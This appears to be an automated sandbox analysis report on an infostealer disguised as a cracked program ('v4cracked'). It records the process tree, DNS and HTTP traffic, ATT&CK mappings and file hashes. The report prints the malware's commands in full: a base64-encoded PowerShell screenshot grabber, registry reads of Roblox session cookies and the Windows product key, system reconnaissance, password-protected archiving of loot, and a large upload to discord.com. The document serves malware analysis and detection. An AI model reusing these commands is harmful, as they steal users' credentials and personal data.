      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3712
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zi3iqxuz\zi3iqxuz.cmdline"
        5⤵
        
        PID:4516
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES433E.tmp" "c:\Users\Admin\AppData\Local\Temp\zi3iqxuz\CSC36D89FDCB067426AB971CB988F96E6C.TMP"
        6⤵
        
        PID:924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2060
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4572
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4008
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4304
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2152
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:5076
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:3936
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4192
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4924
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:668
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:96
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3840
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:4496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4384
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI44282\rar.exe a -r -hp"beamed" "C:\Users\Admin\AppData\Local\Temp\ifvtR.zip" *"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4008
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:96
  - - C:\Users\Admin\AppData\Local\Temp\_MEI44282\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI44282\rar.exe a -r -hp"beamed" "C:\Users\Admin\AppData\Local\Temp\ifvtR.zip" *
      4⤵
      Executes dropped EXE
      PID:1576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:208
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:1256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:3796
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3968
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4776
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4564
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:4612
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\Desktop\v4cracked\v4cracked by trigga8694.exe""
    3⤵
    PID:3492
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      Runs ping.exe
      PID:2448

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
1⤵
- Enumerates processes with tasklist
PID:3464

C:\Windows\system32\getmac.exe
getmac
1⤵
PID:1484

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:3464

Network

DNS

gstatic.com

v4cracked by trigga8694.exe

Remote address:

8.8.8.8:53

Request

gstatic.com

IN A

Response

gstatic.com

IN A

142.250.179.131
DNS

0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa

Remote address:

8.8.8.8:53

Request

0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa

IN PTR

Response
DNS

131.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

131.179.250.142.in-addr.arpa

IN PTR

Response

131.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f31e100net
DNS

ip-api.com

v4cracked by trigga8694.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/json/?fields=225545

v4cracked by trigga8694.exe

Remote address:

208.95.112.1:80

Request

GET /json/?fields=225545 HTTP/1.1
Host: ip-api.com
Accept-Encoding: identity
User-Agent: python-urllib3/2.0.3

Response

HTTP/1.1 200 OK

Date: Tue, 22 Aug 2023 02:19:03 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 167
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

discord.com

v4cracked by trigga8694.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.136.232

discord.com

IN A

162.159.128.233

discord.com

IN A

162.159.138.232

discord.com

IN A

162.159.137.232

discord.com

IN A

162.159.135.232
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
DNS

232.136.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.136.159.162.in-addr.arpa

IN PTR

Response
DNS

63.13.109.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

63.13.109.52.in-addr.arpa

IN PTR

Response
DNS

9.57.101.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

9.57.101.20.in-addr.arpa

IN PTR

Response
DNS

208.143.182.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

208.143.182.52.in-addr.arpa

IN PTR

Response

142.250.179.131:443

gstatic.com

tls

v4cracked by trigga8694.exe

1.1kB
5.5kB
9
9
208.95.112.1:80

http://ip-api.com/json/?fields=225545

http

v4cracked by trigga8694.exe

392 B
516 B
6
4

HTTP Request

GET http://ip-api.com/json/?fields=225545

HTTP Response

200
162.159.136.232:443

discord.com

tls

v4cracked by trigga8694.exe

13.0MB
160.3kB
9421
3581

8.8.8.8:53

gstatic.com

dns

v4cracked by trigga8694.exe

57 B
73 B
1
1

DNS Request

gstatic.com

DNS Response

142.250.179.131
8.8.8.8:53

0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa

dns

118 B
182 B
1
1

DNS Request

0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa
8.8.8.8:53

131.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

131.179.250.142.in-addr.arpa
8.8.8.8:53

ip-api.com

dns

v4cracked by trigga8694.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

discord.com

dns

v4cracked by trigga8694.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.136.232

162.159.128.233

162.159.138.232

162.159.137.232

162.159.135.232
8.8.8.8:53

1.112.95.208.in-addr.arpa

dns

71 B
95 B
1
1

DNS Request

1.112.95.208.in-addr.arpa
8.8.8.8:53

232.136.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

232.136.159.162.in-addr.arpa
8.8.8.8:53

63.13.109.52.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

63.13.109.52.in-addr.arpa
8.8.8.8:53

9.57.101.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

9.57.101.20.in-addr.arpa
8.8.8.8:53

208.143.182.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

208.143.182.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3de7dfd15c46f7130d4fc1fa4770b295

SHA1
b677f2c050b0846f0b646a2dd3c3bf2e71bbcf02

SHA256
2b4f720648bd3c70c150286a116c66aa42bede7e9d0e8f160761bb3dc0bdf9e9

SHA512
b71a3cc929ec5769e5468b6b66d986a2d96c660b2e7073fc9ae6d2ca4e777d980fda1e69f9937bc77171c79090275fc7f5e0deaa7a13729bd00973f179127acb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
45c2d49e4e0e97d102657df150eef27f

SHA1
31598cdb77a5bcb41a06e9a223e6014048debcaa

SHA256
8a6e17fe37b6dab152bf43c04197c95958b804ae36c4f350a337ef0e70534187

SHA512
8c0bd22586e9a3bc459687ca3e8c829a84c09ef4cdf7dfcff06ef4241850ea7f3c8e9b8cd2823c80dd2f4fedf86d9471d5978e2f2425d374b4b3e08b27056d7a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7cce50ad81e35ab81957a364477fad9b

SHA1
c41c1c9d334baaef0b35919be46c234f014de8ea

SHA256
219ee51969a6afcc757a7c7a8cd723ebf2c61b1f0d1ccc43178eec0bd8490a50

SHA512
238e796e413058489abb367eea8969c8084eac1461810f42adc103696ff9222afbe5c3cd3e6937aeb0ffb57dccdd707de0b9aec1ba36307f6cd4a8df37a51593

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ad023ef50fdcc61152ced6720fab9250

SHA1
4be065c1b8d6819311722bc71526de4408eb84a7

SHA256
59f2e2379099a841b9bbb79b9f26265cb20fc47eff92dc8a2cd899aebc72d66a

SHA512
50bfbd82d41ab33d685c8f57df504379b35de60e83e4069bcd6cb6d1d4dccad1a641f7da204b971dfb88fb36c8e66edcf8253e47649d95e101770348888048df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ad023ef50fdcc61152ced6720fab9250

SHA1
4be065c1b8d6819311722bc71526de4408eb84a7

SHA256
59f2e2379099a841b9bbb79b9f26265cb20fc47eff92dc8a2cd899aebc72d66a

SHA512
50bfbd82d41ab33d685c8f57df504379b35de60e83e4069bcd6cb6d1d4dccad1a641f7da204b971dfb88fb36c8e66edcf8253e47649d95e101770348888048df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
29fa2fa9f5c8599cbbfc78e0d74c9580

SHA1
d15908708d1d19a1ab454f7e9242a617ee6c98d3

SHA256
991938d9cd789575eeedebd63d89efd8f6d0f04f4a1b409fbdc397c67c0933b5

SHA512
b618cf92d6e474f6c86b4c780d3bc4ce93b9b62ea30fb9fc347cd9a2f0c203ab7fbfc84f3f506958479481ca393958108202803326c1656b2ba53bd0578e0b96

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES433E.tmp

Filesize
1KB

MD5
ae0128bbf587463c3aa56f1a9d33ffc9

SHA1
7019b48132f776f5206fe02b069a363d45f604b8

SHA256
04bcdcc037137e609a49077ef4dba53989ffb2d7f6aadb165d16e75b05f783c3

SHA512
bc665188bc1814d8666e9cb913e1743fd0aff90f41aeaa13cd4e657e584fc5685bd1a87f8cbf15b24db4696f4460c3ea1a16adb3756b48ca262b190fd81ca14f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI44282\VCRUNTIME140.dll

Filesize
106KB

MD5
4585a96cc4eef6aafd5e27ea09147dc6

SHA1
489cfff1b19abbec98fda26ac8958005e88dd0cb

SHA256
a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

SHA512
d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI44282\_bz2.pyd

Filesize
48KB

MD5
2d461b41f6e9a305dde68e9c59e4110a

SHA1
97c2266f47a651e37a72c153116d81d93c7556e8

SHA256
abbe3933a34a9653a757244e8e55b0d7d3a108527a3e9e8a7f2013b5f2a9eff4

SHA512
eef132df6e52eb783bad3e6af0d57cb48cda2eb0edb6e282753b02d21970c1eea6bab03c835ff9f28f2d3e25f5e9e18f176a8c5680522c09da358a1c48cf14c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI44282\_ctypes.pyd

Filesize
58KB

MD5
1adfe4d0f4d68c9c539489b89717984d

SHA1
8ae31b831b3160f5b88dda58ad3959c7423f8eb2

SHA256
64e8fd952ccf5b8adca80ce8c7bc6c96ec7df381789256fe8d326f111f02e95c

SHA512
b403cc46e0874a75e3c0819784244ed6557eae19b0d76ffd86f56b3739db10ea8deec3dc1ca9e94c101263d0ccf506978443085a70c3ab0816885046b5ef5117

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI44282\_hashlib.pyd

Filesize
35KB

MD5
f10d896ed25751ead72d8b03e404ea36

SHA1
eb8e0fd6e2356f76b5ea0cb72ab37399ec9d8ecb

SHA256
3660b985ca47ca1bba07db01458b3153e4e692ee57a8b23ce22f1a5ca18707c3

SHA512
7f234e0d197ba48396fabd1fccc2f19e5d4ad922a2b3fe62920cd485e5065b66813b4b2a2477d2f7f911004e1bc6e5a6ec5e873d8ff81e642fee9e77b428fb42

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI44282\_lzma.pyd

Filesize
85KB

MD5
3798175fd77eded46a8af6b03c5e5f6d

SHA1
f637eaf42080dcc620642400571473a3fdf9174f

SHA256
3c9d5a9433b22538fc64141cd3784800c567c18e4379003329cf69a1d59b2a41

SHA512
1f7351c9e905265625d725551d8ea1de5d9999bc333d29e6510a5bca4e4d7c1472b2a637e892a485a7437ea4768329e5365b209dd39d7c1995fe3317dc5aecdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI44282\_queue.pyd

Filesize
25KB

MD5
decdabaca104520549b0f66c136a9dc1

SHA1
423e6f3100013e5a2c97e65e94834b1b18770a87

SHA256
9d4880f7d0129b1de95becd8ea8bbbf0c044d63e87764d18f9ec00d382e43f84

SHA512
d89ee3779bf7d446514fc712dafb3ebc09069e4f665529a7a1af6494f8955ceb040bef7d18f017bcc3b6fe7addeab104535655971be6eed38d0fc09ec2c37d88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI44282\_socket.pyd

Filesize
43KB

MD5
bcc3e26a18d59d76fd6cf7cd64e9e14d

SHA1
b85e4e7d300dbeec942cb44e4a38f2c6314d3166

SHA256
4e19f29266a3d6c127e5e8de01d2c9b68bc55075dd3d6aabe22cf0de4b946a98

SHA512
65026247806feab6e1e5bf2b29a439bdc1543977c1457f6d3ddfbb7684e04f11aba10d58cc5e7ea0c2f07c8eb3c9b1c8a3668d7854a9a6e4340e6d3e43543b74

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI44282\_sqlite3.pyd

Filesize
56KB

MD5
eb6313b94292c827a5758eea82d018d9

SHA1
7070f715d088c669eda130d0f15e4e4e9c4b7961

SHA256
6b41dfd7d6ac12afe523d74a68f8bd984a75e438dcf2daa23a1f934ca02e89da

SHA512
23bfc3abf71b04ccffc51cedf301fadb038c458c06d14592bf1198b61758810636d9bbac9e4188e72927b49cb490aeafa313a04e3460c3fb4f22bdddf112ae56

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI44282\_ssl.pyd

Filesize
62KB

MD5
2089768e25606262921e4424a590ff05

SHA1
bc94a8ff462547ab48c2fbf705673a1552545b76

SHA256
3e6e9fc56e1a9fe5edb39ee03e5d47fa0e3f6adb17be1f087dc6f891d3b0bbca

SHA512
371aa8e5c722307fff65e00968b14280ee5046cfcf4a1d9522450688d75a3b0362f2c9ec0ec117b2fc566664f2f52a1b47fe62f28466488163f9f0f1ce367f86

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI44282\base_library.zip

Filesize
1.8MB

MD5
e17ce7183e682de459eec1a5ac9cbbff

SHA1
722968ca6eb123730ebc30ff2d498f9a5dad4cc1

SHA256
ff6a37c49ee4bb07a763866d4163126165038296c1fb7b730928297c25cfbe6d

SHA512
fab76b59dcd3570695fa260f56e277f8d714048f3d89f6e9f69ea700fca7c097d0db5f5294beab4e6409570408f1d680e8220851fededb981acb129a415358d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI44282\blank.aes

Filesize
117KB

MD5
658a6517aef9adeccf1538b00b54c948

SHA1
0fee726522abafbe5f5e01e91a9157524e9d7ba2

SHA256
3310837d3373d287b8bd610126507aef1b78a7be41eeb7851d3116a4a8930595

SHA512
80dc9963e600081163968873e3a69d50e1ba7b1dc71826b70558797f61ea77364275bcea30022a0413af927ce36efb4dfc432a77690b64023565f6730fda41b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI44282\libcrypto-1_1.dll

Filesize
1.1MB

MD5
dffcab08f94e627de159e5b27326d2fc

SHA1
ab8954e9ae94ae76067e5a0b1df074bccc7c3b68

SHA256
135b115e77479eedd908d7a782e004ece6dd900bb1ca05cc1260d5dd6273ef15

SHA512
57e175a5883edb781cdb2286167d027fdb4b762f41fb1fc9bd26b5544096a9c5dda7bccbb6795dcc37ed5d8d03dc0a406bf1a59adb3aeb41714f1a7c8901a17d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI44282\libffi-8.dll

Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI44282\libssl-1_1.dll

Filesize
204KB

MD5
8e8a145e122a593af7d6cde06d2bb89f

SHA1
b0e7d78bb78108d407239e9f1b376e0c8c295175

SHA256
